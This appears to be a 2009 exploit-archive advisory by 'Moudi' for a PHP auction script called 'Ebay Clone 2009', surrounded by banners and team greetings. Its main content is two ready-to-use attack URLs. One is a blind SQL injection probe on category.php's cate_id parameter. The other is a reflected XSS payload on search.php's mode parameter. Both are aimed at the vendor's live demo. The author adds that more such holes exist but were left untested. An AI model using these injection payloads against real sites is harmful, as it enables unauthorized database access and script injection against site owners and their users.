[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ebay Clone 2009 (XSS/bSQL) Multiple Remote Vulnerabilities
# Published : 2009-07-10
# Author : Moudi
# Previous Title : Digitaldesign CMS 0.1 Remote Database Disclosure Vulnerability
# Next Title : LionWiki (index.php page) Local File Inclusion Vulnerability
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
[??] I'm back <3 VB6
==============================================================================
[??] Ebay Clone 2009 Multiple Remote Vulnerabilities
==============================================================================
[??] Script: [ Ebay Clone 2009 ]
[??] Language: [ PHP ]
[??] Download: [ http://www.ebayclonescript.com/ ]
[??] Founder: [ Moudi or SixSo <m0udi@9.cn> ]
[??] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...]
[??] Team: [ EvilWay ]
[??] SiteWeb: [ Visit - www.opensc.ws ]
[??] Price: [ 99$ ]
###########################################################################
===[ Exploit BLIND SQL ]===
[??] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]
[??] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5
===[ Exploit XSS ]===
[??] http://www.site.com/patch/search.php?mode=[XSS]
[??] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Note: in this script have some other blind sql and xss , but i am tired to do all :D
Author: Moudi
###########################################################################
# www.Syue.com [2009-07-10]